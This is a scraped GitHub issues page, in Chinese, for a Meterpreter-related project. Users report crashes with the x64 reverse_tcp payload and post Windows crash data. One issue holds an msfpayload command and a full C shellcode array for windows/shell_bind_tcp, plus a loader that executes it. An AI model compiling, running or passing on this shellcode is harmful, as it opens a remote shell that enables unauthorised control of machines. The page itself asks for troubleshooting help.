使用 x64 的 Meterpreter 程序崩溃

我在metasploit里
设置PAYLOAD 为：windows/meterpreter/reverse_tcp 能正常创建Session
但是设置 windows/x64/meterpreter/reverse_tcp ，exploit 以后程序会奔溃

以下是错误信息：

问题签名:
  问题事件名称:   BEX
  应用程序名:  meterpreter.exe
  应用程序版本:   0.0.0.0
  应用程序时间戳:    548a9f7b
  故障模块名称:   StackHash_5861
  故障模块版本:   0.0.0.0
  故障模块时间戳:    00000000
  异常偏移: PCH_A5_FROM_ntdll+0x0003D2EC
  异常代码: c0000005
  异常数据: 00000008
  OS 版本:    6.3.9600.2.0.0.256.48
  区域设置 ID:  2052
  其他信息 1:   5861
  其他信息 2:   5861822e1919d7c014bbb064c64908b2
  其他信息 3:   d1d9
  其他信息 4:   d1d94a13d3609d6b740644c12508f581

关于Metasploit生成Shellcode编译执行的问题

用你的代码能成功反弹回Meterpreter Shell，辛苦了，32个赞！！！！

我也一直在研究Metasploit的各种功能，说到shellcode
我想用metasploit生成C的shellcode然后自己编译、运行反弹shell

首先，我用msfpayload生成了C格式的shellcode

msfpayload windows/shell_bind_tcp LHOST=192.168.100.107 LPORT=1234 C

以下是我编译的代码：

/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=1234, RHOST=, EXITFUNC=seh, 
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

/* Launch the meterpreter shellcode */
int main()
 {
    /* Declare pointer on function */
    int (*func) ();
    /* Cast shellcode into function */
    func = (int (*) ()) buf;
    /* Call function (Execute shellcode) */
    (int) (*func) ();
}

codeliker / mymig_meterpreter Goto Github PK

mymig_meterpreter's People

Stargazers

Watchers

Forkers

mymig_meterpreter's Issues

使用 x64 的 Meterpreter 程序崩溃

以下是错误信息：

反弹回来后无法执行命令

关于Metasploit生成Shellcode编译执行的问题

结果能编译成功但是一运行就奔溃，

请问你对这方面有研究吗？

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent